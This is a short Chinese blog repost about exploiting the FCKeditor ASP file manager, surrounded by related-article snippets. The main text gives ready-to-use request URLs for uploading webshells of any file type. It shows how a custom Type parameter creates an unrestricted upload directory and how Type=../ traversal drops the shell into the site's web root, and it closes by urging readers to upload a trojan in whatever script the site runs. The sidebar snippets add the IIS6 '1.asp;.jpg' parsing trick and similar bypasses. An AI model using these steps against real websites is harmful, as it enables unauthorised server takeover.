fckeditor asp 漏洞利用

最新推荐文章于 2024-05-14 03:24:06 发布
最新推荐文章于 2024-05-14 03:24:06 发布
阅读量1.6k 收藏
点赞数
分类专栏: 攻防渗透
出现上传漏洞的地址是
http://www.xxx.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp

打开这个地址就可以上传任何类型的文件了,马儿上传到的位置是:
http://www.xxx.com/UserFiles/all/1.asa
"Type=all" 这个变量是自己定义的,在这里创建了all这个目录,而且新的目录没有上传文件格式的限制.

比如输入:
http://www.xxx.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=monyer&Connector=connectors/asp/connector.asp ,所传的文件就到了 http://www.xxx.com/UserFiles/monyer/ 下了,而如果这样输入:http://www.xxx.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/asp/connector.asp

就可以传到网站的根目录下,网站支持什么脚本,传什么脚本的马就可以了.。

转载:http://www.sosuo8.com/article/show.asp?id=3115

blrk
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
编辑器漏洞解析------笔记
tell_me_404的博客
03-04 3799
用编辑器的好处:比网站自带的上传按钮的安全性高 一、编辑器利用 1、查找编辑器目录(通常在网站根目录、用户目录、管理员目录下) 目录扫描:御剑等 目录遍历 蜘蛛爬行:AWVS、BP、菜刀 常见的目录:   editor、edit、upfile.asp、up.html、upimg.htm   图片上传的目录:admin、editor(根据分析网站的编辑器得出)   eweb的默认路径如下:   u...
FCKeditor上传漏洞与IIS6解析漏洞的利用和修补
03-18
- **利用IIS6的解析漏洞**:对于使用ASPASP.NET版本的FCKeditor并运行在IIS6服务器上的站点,可以利用IIS6的文件扩展名解析漏洞上传恶意文件。例如,可以上传名为`1.asp;.jpg`的文件,IIS6会将其作为ASP文件执行。...
编辑器漏洞(配合文件上传等)
guanjian_ci的博客
03-23 5820
编辑器分类:ewebeditor、kindeditor、ckeditor、fckeditor、Cute Editor、ueditor、southidceditor等等 一、ewebeditor编辑器(数据库路径、文件上传、目录遍历、SQL注入等) (1)漏洞1 Admin_Login.asp 登录页面 Admin_Default.asp 管理首页 Admin_Style.asp 样式页面 Admin_UploadFile.asp 上...
2024年【渗透测试】--- FCKeditor文本编辑器漏洞_ckeditor漏洞,保洁阿姨看完都会了
最新发布
2401_85013604的博客
05-14 760
迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
【渗透课程】第八篇-上传漏洞之文本编辑器上传
weixin_30485379的博客
06-11 397
Oday 常见的文本编辑器有CKEditor,Ewebeditor,UEditor,KindEditor,XHeditor等。其包含的功能类似,比如,图片上传、视频上传、远程下载等。 使用这类编辑器减少了程序开发的时间,但也存在通用性漏洞带来的危害 以FCKeditor(现已更名为CKEditor)为例,其存在如下漏洞 一、敏感信息暴露 1.1 查看版本信息 /FCKeditor/ed...
fckeditor编辑器漏洞
D1stiny的博客
04-07 3300
查看fckeditor编辑器版本 /_whatsnew.html /editor/dialog/fck_about.html 查出版本信息之后就可以到网上搜相应的漏洞 version2.2 Apache+linux 环境下在上传文件后面加个.突破 version<=2.4.2 For php 该版本在处理PHP上传的地方没有对Media类型进行上传文件类型的控制,导致用户上传任意...
常见编辑器漏洞利用
qq_40529133的博客
04-24 2371
FCKeditor编辑器漏洞利用; EWEBeditor编辑器漏洞利用; 其他类型编辑器漏洞利用; 如何查看站点的编辑器类型: 前端用户可以利用“目录扫描”,“蜘蛛爬行”来查找编辑器。利用御剑的后台目录扫描可以找到放置在网站根目录下的编辑器名称: 如果编辑器不存在于网站根目录。可以在扫描站点后加上/admin,扫描管理员目录进一步挖掘。 还可以利用Googlehack 查找 比如 inurl:ew...
FCKeditor漏洞
05-28
例如,在利用2003系统路径解析漏洞时,攻击者可能会创建一个名为`bin.asp`的目录,并在该目录下上传恶意文件,随后利用该文件被脚本解析器以相应脚本权限执行的能力进行进一步攻击。 #### 总结与防范措施 ...
FCKeditor文件上传漏洞及利用-File-Upload-Vulnerability-in-FCKEditor1
08-03
【FCKeditor文件上传漏洞及利用 - File-Upload-Vulnerability-in-FCKEditor1】 本文主要探讨了FCKeditor(现称为CKeditor)中的PHP文件上传模块存在的安全漏洞,允许攻击者绕过文件类型检查,将恶意PHP代码上传到...
FCKeditor 2.6.6 可直接使用
07-19
.NET开发者可以利用ASP.NET控件或者JavaScript API将FCKeditor整合到ASP.NET Web应用程序中,为用户提供强大的文本编辑功能。 总结起来,FCKeditor 2.6.6是一个经典的在线文本编辑器,尽管现在有更多先进的替代品,...
常用网页编辑器漏洞手册(全面版)fckeditor,ewebeditor
10-28
FCKeditor还存在一个利用2003系统路径解析漏洞的情况,攻击者可以通过创建特殊命名的目录(如"bin.asp")并上传文件,使文件以特定脚本的权限被执行。此外,FCKeditor的PHP版本在2.2至2.4.2之间的某些版本存在一个...
fckeditor for asp(配置完成版)
04-29
fckeditor for asp(配置完成版)
fckeditor2.66 for ASP中文版
08-28
fckeditor2.66 for ASP中文版包括FCKeditor使用方法
fckeditor 上传漏洞解决
04-12
解决fckeditor 上传漏洞,类似asp;.jpg asp.jpg
FCKEDITOR_ASP
12-03
具体设置参考:http://blog.csdn.net/duan618/article/details/5420528
FCKEditor_ASP精简版
09-12
可以用作新闻系统后台或BBS(ASP语言开发),本人自己精简的,希望能给大家带来方便
FCKeditor使用初步
Life
05-22 3541
 周末了,昨晚回来我就休息了,从18:30睡到今天07:20,太厉害了,醒来的时候,还在想着晚上的美梦……    拿到FCKeditor已经很久了,今天可以坐下来研究研究了,首先设置一下IIS,XP只能设一个网站。烦人,每次都要换来换去,要不是机器不能装2003,我才不用XP呢。    不用说,在Maxthon的搜索栏里输入“FCKeditor使用”,百度和Google里出来了很多内容。我只用这两
FCK上传总结
安全汪
05-05 1553
适合asp站点 1、浏览查看文件 http://127.0.0.1/fckeditor/editor/filemanager/browser/default/browser.html?Connector=http://127.0.0.1/fckeditor/editor/filemanager/connectors/asp/connector.asp 2、创建asp.asp文件夹 http:
FCKeditor编辑器漏洞
墨鱼菜鸡
04-07 184
目录 FCKeditor asp网页 aspx网页 php网页 jsp网页 FCKeditor FCKeditor是一个功能强大支持所见即所得功能的文本编辑器,可以为用户提供微软office软件一样的在线文档编辑服务。它不需要安装任何形式的客户端,兼容绝大多数主流浏览器,支持ASP.Net、...
fckeditor 漏洞
04-28
然而,FCKeditor也已经被证实存在一些漏洞,这些漏洞可能导致用户数据泄露、系统被攻击等问题。 一种有名的FCKeditor漏洞是文件上传漏洞。攻击者可以在上传过程中注入恶意代码,使其能够运行在服务端上,从而导致...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值